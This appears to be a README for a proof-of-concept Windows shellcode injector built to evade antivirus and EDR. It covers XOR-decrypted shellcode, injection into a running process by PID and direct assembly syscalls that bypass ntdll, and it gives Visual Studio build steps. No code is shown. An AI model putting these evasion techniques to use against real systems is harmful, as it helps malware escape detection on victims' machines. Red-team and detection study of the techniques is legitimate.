Proof of concept Windows shellcode injector to bypass AV and EDR. Currently uses assmebly partially created with the help of Syswhispers to load system call numbers and make calls. Due to the outdated nature of the project, I had to add the last batch of Windows installations myself to make it compatible with all modern Windows versions -- Starting from the first release of Windows 10 (1507) to the most recent release of Windows 11 (23H2).
- Decrypts XOR shellcodes and injects into running process with passed PID
- Use of Windows kernel timer call locations to syscalls through them (NtCreateTimer, NtOpenTimer, NtSetTimer, NtQueryTimer, NtCancelTimer)
- Makes syscalls directly through assembly, avoiding the use of NTdll or Windows API to make calls
- Built with x64 assmebly, Windows API, and standard C++ libraries
Follow these simple steps to setup your environment and compile the injector:
- Shellcode must be XOR encrypted BEFORE you paste into code, or comment out decryption call (line 31)
- Visual Studio or another way to compile and link C++ with assembly (see compiling below for more details)
-
Clone or download the repository to your local machine
-
Create a new C++ Visual Studio project in the directory
-
Open main.cpp and syscalls.asm as source files and wonka.h as a header file
-
Make changes to necessary components (shellcode, XOR key)
-
Follow compilation steps
-
Right click on project name in Solution Explorer and click Build Dependencies --> Build Customizations
-
Check "masm" box and click Okay (see below)
-
Right click syscalls.asm file in Solutions Explorer and click Properties
-
Set "Excluded From Build" to No, "Content" to Yes, and "Item Type" to Microsoft Macro Assembler (see below)
-
Ready to Compile!
Done!